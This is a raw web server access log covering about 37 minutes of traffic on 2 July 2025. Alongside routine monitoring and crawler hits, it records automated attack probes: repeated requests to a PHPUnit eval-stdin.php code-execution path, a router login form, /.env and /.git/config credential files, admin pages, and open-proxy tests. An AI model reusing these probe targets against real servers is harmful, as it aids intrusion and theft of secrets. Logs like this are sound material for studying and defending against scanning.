77.90.153.48 - - [02/Jul/2025:19:10:18 +0200] "GET /2z5DLD9s28vInMce66qamFxI3G3.jsp HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
212.91.247.32 - - [02/Jul/2025:19:10:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [02/Jul/2025:19:11:23 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:19:11:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [02/Jul/2025:19:12:32 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:19:12:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:19:13:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:19:14:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [02/Jul/2025:19:14:57 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
79.124.58.198 - - [02/Jul/2025:19:15:12 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
176.65.149.178 - - [02/Jul/2025:19:15:23 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.247.32 - - [02/Jul/2025:19:15:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:19:16:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [02/Jul/2025:19:17:18 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
79.124.58.198 - - [02/Jul/2025:19:17:40 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:19:17:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:19:18:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [02/Jul/2025:19:18:55 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:19:19:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [02/Jul/2025:19:20:33 +0200] "GET /login.asp HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:19:20:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.3.221.137 - - [02/Jul/2025:19:21:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [02/Jul/2025:19:21:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.3.221.137 - - [02/Jul/2025:19:22:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
18.201.186.11 - - [02/Jul/2025:19:22:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
212.91.247.32 - - [02/Jul/2025:19:22:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [02/Jul/2025:19:22:59 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:19:23:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:19:24:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:19:25:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:19:26:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [02/Jul/2025:19:27:26 +0200] "POST /admin/login.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0"
77.90.153.48 - - [02/Jul/2025:19:27:37 +0200] "POST /admin/login.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0"
212.91.247.32 - - [02/Jul/2025:19:27:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [02/Jul/2025:19:27:54 +0200] "GET /admin/dashboard.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
87.121.84.130 - - [02/Jul/2025:19:28:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [02/Jul/2025:19:28:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.90.32.174 - - [02/Jul/2025:19:29:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:19:29:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [02/Jul/2025:19:30:14 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
79.124.58.198 - - [02/Jul/2025:19:30:45 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:19:30:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.3.221.137 - - [02/Jul/2025:19:31:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [02/Jul/2025:19:31:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [02/Jul/2025:19:32:06 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
79.124.58.198 - - [02/Jul/2025:19:32:07 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:19:32:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [02/Jul/2025:19:32:54 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
87.121.84.130 - - [02/Jul/2025:19:33:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [02/Jul/2025:19:33:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [02/Jul/2025:19:34:09 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
161.35.171.225 - - [02/Jul/2025:19:34:48 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
161.35.171.225 - - [02/Jul/2025:19:34:48 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
212.91.247.32 - - [02/Jul/2025:19:34:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:19:35:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.46 - - [02/Jul/2025:19:36:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:19:36:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
4.227.36.18 - - [02/Jul/2025:19:37:08 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.217 - - [02/Jul/2025:19:37:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.220.154.78 - - [02/Jul/2025:19:37:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:19:37:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
47.237.115.100 - - [02/Jul/2025:19:38:39 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.247.32 - - [02/Jul/2025:19:38:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:19:39:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.134.148.59 - - [02/Jul/2025:19:40:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.134.148.59 - - [02/Jul/2025:19:40:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:19:40:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.251.153.117 - - [02/Jul/2025:19:41:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.3.221.137 - - [02/Jul/2025:19:41:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [02/Jul/2025:19:41:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.134.148.59 - - [02/Jul/2025:19:42:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.134.148.59 - - [02/Jul/2025:19:42:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:19:42:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
4.227.36.28 - - [02/Jul/2025:19:43:09 +0200] "GET /robots.txt HTTP/1.1" 404 326 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:43:09 +0200] "GET /www.personal-dienstleistung.de/2011-11-17-web.tgz HTTP/1.1" 404 365 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:43:12 +0200] "GET /localhost/log/2019/01/web.log HTTP/1.1" 404 345 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:43:16 +0200] "GET /www2.prokommunal.com/ HTTP/1.1" 404 337 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:43:19 +0200] "GET /www2.modeinstitut-berlin.de/ HTTP/1.1" 404 344 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:43:22 +0200] "GET /web64/ HTTP/1.1" 404 322 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:43:25 +0200] "GET /webalizer/usage_202410.html HTTP/1.1" 404 343 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:43:28 +0200] "GET /visitate.f-m-computer.de/von_visitate/Grundlagen_Weltwissen.zip HTTP/1.1" 404 379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:43:31 +0200] "GET /www.quartier-bb.de/ HTTP/1.1" 404 335 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:43:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:43:38 +0200] "GET /web35/log/2013/04/ HTTP/1.1" 404 334 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:43:40 +0200] "GET /web61/log/2014/11/web.log HTTP/1.1" 404 341 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:43:43 +0200] "GET /web35/log/2011/01/web.log HTTP/1.1" 404 341 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.134.148.59 - - [02/Jul/2025:19:43:43 +0200] "\x16\x03\x01" 501 318 "-" "-"
20.171.207.122 - - [02/Jul/2025:19:43:46 +0200] "GET /web35/log/2010/11/web.log HTTP/1.1" 404 341 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:43:49 +0200] "GET /www.dr-heidi-fleischer.de/ HTTP/1.1" 404 342 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:43:52 +0200] "GET /www.sv-buchholz.de/ HTTP/1.1" 404 335 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.91.247.32 - - [02/Jul/2025:19:43:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
20.171.207.122 - - [02/Jul/2025:19:43:54 +0200] "GET /www.straman.de/ HTTP/1.1" 404 331 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:43:57 +0200] "GET /www.beton-bib.de/ HTTP/1.1" 404 333 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:44:00 +0200] "GET /www.dr-heidi-fleischer.de/ssl/ HTTP/1.1" 404 346 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:44:03 +0200] "GET /www.alle-ziele-spedition.de/log/2017/03/ HTTP/1.1" 404 356 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:44:06 +0200] "GET /www.dialyse-in-salzwedel.de/phptmp/ HTTP/1.1" 404 351 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:44:09 +0200] "GET /www.morusverlag.de/log/2015/01/ HTTP/1.1" 404 347 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.134.148.59 - - [02/Jul/2025:19:44:11 +0200] "\x16\x03\x01" 501 318 "-" "-"
20.171.207.122 - - [02/Jul/2025:19:44:12 +0200] "GET /web65/ HTTP/1.1" 404 322 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:44:15 +0200] "GET /web35/log/2010/11/web.log HTTP/1.1" 404 341 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:44:17 +0200] "GET /www.alle-ziele-spedition.de/log/2018/07/web.log HTTP/1.1" 404 363 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:44:20 +0200] "GET /www.discothek-harmonie.de/log/2019/06/web.log HTTP/1.1" 404 361 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:44:23 +0200] "GET /www.sv-buchholz.de/ HTTP/1.1" 404 335 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:44:26 +0200] "GET /web10/phptmp/ HTTP/1.1" 404 329 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:44:29 +0200] "GET /web67/web/env/jomox/jomox.html HTTP/1.1" 404 346 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:44:32 +0200] "GET /web18/log/2020/06/web.log HTTP/1.1" 404 341 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:44:34 +0200] "GET /www.dr-heidi-fleischer.de/ssl/ HTTP/1.1" 404 346 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:44:37 +0200] "GET /web51/log/2014/04/web.log HTTP/1.1" 404 341 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:44:40 +0200] "GET /web4/log/2013/04/web.log HTTP/1.1" 404 340 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:44:43 +0200] "GET /www2.f-m-computer.de/log/2016/12/web.log HTTP/1.1" 404 356 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:44:46 +0200] "GET /www.morusverlag.de/log/2015/01/ HTTP/1.1" 404 347 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.134.148.59 - - [02/Jul/2025:19:44:48 +0200] "SSH-2.0-Go" 501 325 "-" "-"
20.171.207.122 - - [02/Jul/2025:19:44:49 +0200] "GET /www2.f-m-computer.de/log/2012/04/web.log HTTP/1.1" 404 356 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:44:51 +0200] "GET /web52/log/web.log HTTP/1.1" 404 333 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.91.247.32 - - [02/Jul/2025:19:44:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
20.171.207.122 - - [02/Jul/2025:19:44:54 +0200] "GET /chat.f-m-shop.de/log/2014/11/web.log HTTP/1.1" 404 352 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:44:57 +0200] "GET /ftp.modeinstitut-berlin.de/user/web49_mode_ftp01/Quelle/Fehlerbericht.zip HTTP/1.1" 404 389 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:45:00 +0200] "GET /ftp.modeinstitut-berlin.de/user/web49_mode_ftp01/Quelle/Fehlerbericht%20(2).zip HTTP/1.1" 404 393 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:45:03 +0200] "GET /web49/user/web49_mode_ftp02/Frankfurt%20FraSecDatenbank/FraDat.mdb HTTP/1.1" 404 380 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:45:06 +0200] "GET /web5/user/web5_maxima/ HTTP/1.1" 404 338 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.122 - - [02/Jul/2025:19:45:08 +0200] "GET /web49/user/web49_mode_ftp02/Frankfurt%20FraSecDatenbank/FraDat.mdb HTTP/1.1" 404 380 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.134.148.59 - - [02/Jul/2025:19:45:18 +0200] "SSH-2.0-Go" 501 325 "-" "-"
3.130.96.91 - - [02/Jul/2025:19:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:19:45:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.47 - - [02/Jul/2025:19:46:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
195.3.221.137 - - [02/Jul/2025:19:46:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
3.134.148.59 - - [02/Jul/2025:19:46:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.130.96.91 - - [02/Jul/2025:19:46:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.130.96.91 - - [02/Jul/2025:19:46:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.130.96.91 - - [02/Jul/2025:19:46:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
87.121.84.149 - - [02/Jul/2025:19:46:48 +0200] "GET http://ifconfig.me/ HTTP/1.1" 200 1229 "-" "curl/7.81.0"
3.130.96.91 - - [02/Jul/2025:19:46:48 +0200] "SSH-2.0-Go" 501 325 "-" "-"
212.91.247.32 - - [02/Jul/2025:19:46:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.134.148.59 - - [02/Jul/2025:19:46:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
23.94.187.142 - - [02/Jul/2025:19:47:11 +0200] "CONNECT httpbin.org:443 HTTP/1.1" 405 341 "-" "Go-http-client/1.1"
